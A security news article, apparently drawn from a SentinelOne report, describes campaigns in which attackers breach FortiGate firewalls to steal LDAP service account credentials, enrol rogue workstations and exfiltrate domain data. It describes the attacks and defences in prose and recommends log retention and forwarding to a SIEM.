FortiGate Devices Targeted in Cyber Attacks to Steal Service Account Credentials

Overview of the Threat Campaign

Cybersecurity researchers have raised alarms regarding a new campaign where threat actors exploit FortiGate Next-Generation Firewall (NGFW) appliances to infiltrate victim networks. This activity involves leveraging recently disclosed vulnerabilities or weak credentials to extract configuration files that contain sensitive service account credentials and network topology information. The campaign has primarily targeted sectors such as healthcare, government, and managed service providers.

Exploitation of Vulnerabilities

According to a report from SentinelOne, the FortiGate appliances possess significant access to the environments they are designed to protect. This access often includes service accounts linked to authentication infrastructures like Active Directory (AD) and Lightweight Directory Access Protocol (LDAP). Security researchers Alex Delamotte, Stephen Bromfield, Mary Braden Murphy, and Amey Patne noted that this configuration allows the appliances to map roles to specific users by analyzing connection attributes and correlating them with directory information. Such capabilities can enhance response times for network security alerts.

However, this access can also be exploited by attackers who breach FortiGate devices through known vulnerabilities, such as CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858, or through misconfigurations.

Incident Reports

In November 2025, attackers reportedly compromised a FortiGate appliance, creating a new local administrator account named “support.” This account was used to establish four new firewall policies, enabling unrestricted traversal across all zones. The attackers maintained periodic checks to ensure the device remained accessible, a tactic consistent with initial access brokers (IABs) who establish footholds for resale to other criminal actors.

The subsequent phase of this activity was detected in February 2026, when an attacker likely extracted a configuration file containing encrypted service account LDAP credentials. Evidence indicated that the attacker authenticated to the AD using clear text credentials from the fortidcagent service account, suggesting that they decrypted the configuration file to obtain the service account credentials.

Using these credentials, the attacker authenticated to the victim’s environment and enrolled rogue workstations in the AD, facilitating deeper access. Network scanning was initiated, leading to the detection of the breach and halting further lateral movement.

Additional Attack Vectors

In a separate incident investigated in late January 2026, attackers quickly transitioned from firewall access to deploying remote access tools such as Pulseway and MeshAgent. They also downloaded malware from a cloud storage bucket via PowerShell from Amazon Web Services (AWS) infrastructure. The Java malware, launched through DLL side-loading, was utilized to exfiltrate sensitive data, including the contents of the NTDS.dit file and the SYSTEM registry hive, to an external server over port 443.

While the actor may have attempted to crack passwords from the harvested data, no credential usage was identified between the time of credential harvesting and incident containment.

Delamotte indicated that the company’s Digital Forensics and Incident Response (DFIR) team has observed similar techniques in other cases, such as staging files in USOShared paths. This suggests a broader campaign where FortiGate devices are not exclusively used for initial access.

Distinct Attack Patterns

Currently, there is no evidence linking the two incidents to the same threat actor, as the post-compromise techniques employed differ significantly. For instance, the first incident involved the joining of rogue attacker workstations to the AD, while the second incident followed a multi-chain lateral movement operation that aligns with pre-ransomware activity. The attacks were thwarted before any later-stage payloads could be deployed.

These findings underscore the ongoing threat actors pose to perimeter devices, which are increasingly being targeted as initial access points for deeper compromises within enterprise networks. A common factor in both incidents is the inadequate logging on the firewalls, which hampers the ability to understand how and when attackers gained initial access.

Recommendations for Organizations

Organizations are advised to maintain a minimum of 14 days of log retention and to forward all logs to a Security Incident and Event Monitoring (SIEM) system. This approach can help mitigate scenarios where an attacker may delete logs from a local machine to obscure their tracks.

NGFW appliances have become prevalent due to their robust network monitoring capabilities, integrating firewall security controls with management features like AD. However, these devices are high-value targets for a range of threat actors, from state-aligned entities conducting espionage to financially motivated attackers engaging in ransomware activities.

As reported by thehackernews.com.